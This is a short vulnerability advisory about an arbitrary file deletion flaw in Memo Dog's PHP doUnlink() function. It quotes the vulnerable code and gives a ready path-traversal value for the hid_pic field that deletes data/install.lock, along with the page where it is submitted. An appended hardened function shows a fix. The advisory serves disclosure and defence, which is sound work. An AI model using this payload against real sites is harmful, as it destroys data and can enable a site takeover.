Memo Dog arbitrary file deletion: vulnerability warning (Black Bar Safety Net)

ID MYHACK58:62201234712
Type myhack58
Reporter Anonymous
Modified 2012-08-26T00:00:00


Conditions for use:

  1. Windows hosts only; it does not work on Linux (at least on my current machine).

  2. A registered user account.

  3. The file to be deleted must be readable and writable.

In modules/ajax/event.mod.php

Protective deletion of the picture:

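function doUnlink($pic){
    if(!$pic) return false;
    // The extension is taken from whatever follows the last "." in the supplied path
    $type = trim(strtolower(end(explode(".",$pic))));
    // The pattern is not anchored, so anything may follow the matching prefix
    $exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.$type;
    if(ereg($exp,$pic)){
        unlink(strtr($pic,'_b.','_s.'));
        return true;
    }else {
        return false;
    }
}
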
This function is called in onloadPic:



$hid_pic = $this->Post['hid_pic'];

$eid = (int) $this->Post['id'];




As long as $_FILES['pic']['name'] is not empty, we can construct hid_pic.

hid_pic content:

././images/event/1234567890{MEMBER_ID}_b.{suffix of the file you want to delete}/../../../{the file you want to delete}

For example, if we want to remove the ./data/install.lock file and my MEMBER_ID is 2, then:

././images/event/12345678902_b.lock/../../../data/install.lock

The local test was successful.

Actual use:

In index.php?mod=event&code=pevent

Upload a picture, then fill in the hid_pic field with ././images/event/12345678902_b.lock/../../../data/install.lock

Fix:

Do it yourself.
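
One way to harden doUnlink() against the hid_pic value shown above, as an added example that is not Memo Dog's own code; the name safeUnlinkEventPic(), the $baseDir parameter and the extension allow-list are assumptions. It validates only the file name with an anchored pattern, then confirms with realpath() that the resolved path sits in the event picture directory before deleting.

```php
<?php
// Added example (not Memo Dog's code). safeUnlinkEventPic(), the $baseDir
// parameter and the extension allow-list are assumptions for illustration.
function safeUnlinkEventPic(string $pic, int $memberId, string $baseDir): bool
{
    // Keep the file name only; any directory part sent by the client is dropped.
    $name = basename(str_replace('\\', '/', $pic));

    // Anchored at both ends, with the extension taken from a fixed allow-list
    // instead of from the input, so nothing can follow the matching part.
    $re = '/^[0-9]{10}' . $memberId . '_b\.(jpe?g|png|gif)$/';
    if (!preg_match($re, $name)) {
        return false;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }

    $deleted = false;
    // Big picture and thumbnail. str_replace() swaps the substring "_b.";
    // three-argument strtr() maps single characters instead.
    foreach ([$name, str_replace('_b.', '_s.', $name)] as $file) {
        $real = realpath($base . DIRECTORY_SEPARATOR . $file);
        // realpath() resolves ".." and links; the result must sit directly in $base.
        if ($real !== false && dirname($real) === $base && is_file($real)) {
            $deleted = unlink($real) || $deleted;
        }
    }
    return $deleted;
}

// Constructed demo in a temporary directory, with MEMBER_ID 2 as in the text.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'event_demo_' . getmypid();
mkdir($dir);
touch($dir . '/12345678902_b.jpg');
touch($dir . '/12345678902_s.jpg');
// A picture name in the expected form:
var_dump(safeUnlinkEventPic('././images/event/12345678902_b.jpg', 2, $dir));
// The hid_pic value from the text above:
var_dump(safeUnlinkEventPic('././images/event/12345678902_b.lock/../../../data/install.lock', 2, $dir));
rmdir($dir);
```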